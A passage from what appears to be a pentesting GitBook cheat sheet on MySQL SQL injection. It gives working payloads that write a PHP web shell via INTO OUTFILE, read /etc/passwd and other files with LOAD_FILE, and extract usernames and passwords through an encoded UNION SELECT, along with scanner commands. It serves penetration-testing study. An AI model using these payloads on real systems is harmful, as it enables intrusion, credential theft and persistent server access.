clustered_index_size | sum_of_other_index_sizes | +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ | dvwa | guestbook | 2017-01-19 21:02:57 | 0 | 1 | 0 | | dvwa | users | 2017-01-19 21:03:07 | 5 | 1 | 0 | ... +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ mysql> show tables in dvwa; +----------------+ | Tables_in_dvwa | +----------------+ | guestbook | | users | +----------------+ ``` ### Version alternative ```sql mysql> select @@innodb_version; +------------------+ | @@innodb_version | +------------------+ | 5.6.31 | +------------------+ mysql> select @@version; +-------------------------+ | @@version | +-------------------------+ | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ mysql> mysql> select version(); +-------------------------+ | version() | +-------------------------+ | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ ``` Source: {% embed url="" %} ## Reading / Writing Files {% embed url="" %} {% hint style="info" %} Requires privileged user {% endhint %} | Description | Query | | -------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Dump to file | SELECT \* FROM mytable INTO dumpfile '/tmp/somefile' | | Dump PHP Shell | SELECT 'system($\_GET\['c']); ?>' INTO OUTFILE '/var/www/shell.php' | | Read File | SELECT LOAD\_FILE('/etc/passwd') | | Read File Obfuscated |

SELECT LOAD\_FILE(0x633A5C626F6F742E696E69)
reads c:\boot.ini

| | File Privileges |

SELECT file\_priv FROM mysql.user WHERE user = 'netspi'
SELECT grantee, is\_grantable FROM information\_schema.user\_privileges WHERE privilege\_type = 'file' AND grantee like '%netspi%'

| ## XML-based SQL Injection XML escape sequence to encode the `S` character in `SELECT` ``` 123 999 SELECT * FROM information_schema.tables ``` With Hackvector: select the payload - right click - extensions - Hackvector - Encode - Hex Entities
``` 1<@hex_entities>1 UNION SELECT username || '~' || password FROM users ``` ## Polyglots SQLi {% embed url="" %} ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Payload {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Tools {% content-ref url="../tools/sqlmap" %} [sqlmap](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/sqlmap) {% endcontent-ref %} Scanner for **time-based SQL injection (SQLi):** {% embed url="" %} {% embed url="" %} {% embed url="" %} ``` sqlmc -u https://example.com sqlmc -u http://testphp.vulnweb.com/listproducts.php?cat=1 -d 2 -t 10 ``` {% embed url="" %} SqliSniper {% endembed %} {% embed url="" %} {% embed url="" %} ghauri {% endembed %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)
## Interesting Books {% content-ref url="../../interesting-books" %} [interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more * [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them * [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery. ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)